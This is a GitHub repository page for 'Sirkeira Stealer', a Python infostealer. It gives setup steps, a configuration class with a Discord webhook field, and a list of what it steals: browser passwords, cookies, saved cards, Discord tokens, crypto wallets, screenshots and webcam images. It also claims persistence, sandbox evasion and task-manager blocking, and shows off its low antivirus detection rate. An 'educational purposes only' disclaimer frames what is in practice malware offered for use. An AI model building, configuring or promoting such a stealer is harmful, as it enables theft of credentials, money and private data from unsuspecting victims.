Skip to content

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

Sirkeira Stealer

Warning

This code is provided for EDUCATIONAL PURPOSES ONLY to study system security. Malicious use of this software is strictly prohibited and illegal. The author is not responsible for any misuse.

Explanation

This is a Python script that demonstrates the techniques used by "stealer" malware to extract sensitive information from a Windows system. It collects data such as browser passwords, cookies, Discord tokens, system information, and interesting files, then sends them to a Discord webhook. The code includes methods for system persistence, sandbox evasion, and task manager blocking.

Developed by: @CirqueiraDev

How to Install

  1. Clone the repository or download the skstealer.py file.
  class Malware:
      def __init__(self):
          self.zip_name = f"SK_{random.randint(10000000000, 99999999999)}.zip"
          self.webhook_url = "YOUR DISCORD WEBHOOK HERE"
          self.stealer_version = "1.5.2"
          self.malware_name = "Sirkeira Stealer"
          self.malware_author = "https://t.me/CirqueiraDev"
          self.browser_infos = ["extentions", "passwords", "cookies", "history", "downloads", "cards"]
          self.session_files = ["Wallets", "Game Launchers", "Apps"]
          self.task_manager_blocked = False # dont change this line
  1. Open the skstealer.py file and modify the configuration inside the Malware class:
    • Change self.webhook_url to your actual Discord webhook URL.
    • (Optional) Modify self.browser_infos to select which browser data to steal (e.g., "passwords", "cookies").
    • (Optional) Modify self.session_files to select which session files to target (e.g., "Wallets", "Game Launchers").

Requirements

pip install -r requirements.txt
requests
psutil
browser-cookie3
cryptography
pywin32
pycryptodome
opencv-python
Pillow

Stealer Functions

  • Screenshot
  • Webcam
  • System infos
  • Browser infos (extentions, passwords, cookies, history, downloads, cards)
  • Session files (Wallets, Game Launchers, Apps)
  • AntiVirus infos
  • Discord tokens
  • Roblox cookies
  • Interesting files

Antivirus Detection Status (VirusTotal)

  • Avast - Python:Stealer-FJ [PWS]
  • AVG - Python:Stealer-FJ [PWS]
  • ESET-NOD32 - Python/PSW.Agent.DYB Trojan
  • Huorong - TrojanSpy.OSX.Stealer.e
  • Rising - Stealer.Agent/Python!1.103FE (CLASSIC)
  • Kaspersky - Undetected
  • BitDefender - Undetected
  • Malwarebytes - Undetected
  • Microsoft Defender - Undetected
  • CrowdStrike Falcon - Undetected

Total 7/63 (the code wasn’t protected)

HASH:

e0fb6a9dfac0e9544f1a4c39a6e89a35b16b38aae8ad674f3085d7504ee8e3ab

VirusTotal detections may vary depending on heuristic analysis.

Important

The creator is not responsible for any direct or indirect damage resulting from misuse of this material. Whatever you choose to do is entirely at your own risk and responsibility.

Credits:

Releases

Packages

Contributors

Languages